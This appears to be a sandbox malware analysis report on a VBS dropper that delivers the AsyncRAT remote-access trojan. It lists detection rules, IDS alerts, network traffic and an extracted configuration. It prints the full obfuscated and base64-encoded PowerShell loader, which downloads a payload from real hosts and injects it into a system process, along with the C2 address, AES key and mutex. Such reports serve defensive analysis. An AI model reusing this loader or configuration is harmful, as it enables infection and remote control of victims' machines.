9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQ

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs", ProcessId: 5492, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQ

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs", ProcessId: 5492, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc

Suricata Signatures

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T05:28:20.180666+0200	2020424	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.6	49713	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T05:28:23.150330+0200	2842478	1	Malware Command and Control Activity Detected	148.113.165.11	3236	192.168.2.6	49714	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T05:28:20.027735+0200	2841075	1	Malware Command and Control Activity Detected	192.168.2.6	49713	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "148.113.165.11", "Ports": "3236", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "V4JA2wRo4wMqThNx0lUpEh05ezE9saTH", "Mutex": "Dggx_gg", "Certificate": "MIICJjCCAY+gAwIBAgIVAKTSE5n95JKjYKaeetJmkZ8WSed/MA0GCSqGSIb3DQEBDQUAMFoxCzAJBgNVBAMMAmdnMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMxMjAzMTAyNjE5WhcNMzQwOTExMTAyNjE5WjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAphKhL5VEa5bZce3HMNoHj07+Nyd8QMtT+YV1vVQeIuxBYfOBrszAxxSRJayhzQwZjw8Du9bw87agBJW06h+GHW8MOufcZ+vKSxmpOL0ze3nUSJiOsfboKa06jcmEpo32D7LTxng9/mAGKb0YGEFUGx88yMDaa+NiBIn/LnWXvaECAwEAAaMyMDAwHQYDVR0OBBYEFMn0HT3AJLPhSr+HTYNM/0589fJ0MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEASB+of3f3t+mAacV7FNg5vwlQhgObMv2su+9BL5KxsQVNsBhluNcrZINzF5jKq/8VafO48B00S1O2MnNHmBXQlZ09Iw8Krvm1hZDmBErHPe0Bwwa5ox6ZpJLnodcOGX2JXMfEY2n/6QC0zva9sGQiyazHOYJRTk5RgJhN7j10nZY=", "ServerSignature": "XjeYWme80rSVhHa/BEFI1k3bRgPGhkJfVbkFLvepbqtufl6cOLxu+woVZZM7psVFdchemmHXVOOta4B/iTyJBzInHTih/neulrIRbgq5zdS22cEhHESwIui1ZS3o5BnYGcZRdZTdXfGH6otoicbOBzdpc41nx3BIOXuL5tRHqjI=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Multi AV Scanner detection for submitted file

Source: 1iH5ABLKIA.vbs

Virustotal: Detection: 8%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2

Source:

Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.2297059905.00000219A7700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2274321947.000002199FEDC000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 148.113.165.11:3236 -> 192.168.2.6:49714
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.6:49713

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic

TCP traffic: 192.168.2.6:49714 -> 148.113.165.11:3236

Source: global traffic	HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/AaTNM/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 148.113.165.11 148.113.165.11
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 207.241.227.240 207.241.227.240

Source: Joe Sandbox View	ASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11
Source: unknown	TCP traffic detected without corresponding DNS query: 148.113.165.11

Source: global traffic	HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/AaTNM/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ia600100.us.archive.org
Source: global traffic	DNS traffic detected: DNS query: paste.ee

Source: AddInProcess32.exe, 00000005.00000002.3466547195.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: AddInProcess32.exe, 00000005.00000002.3466547195.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.2257689988.0000021990578000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ia600100.us.archive.org
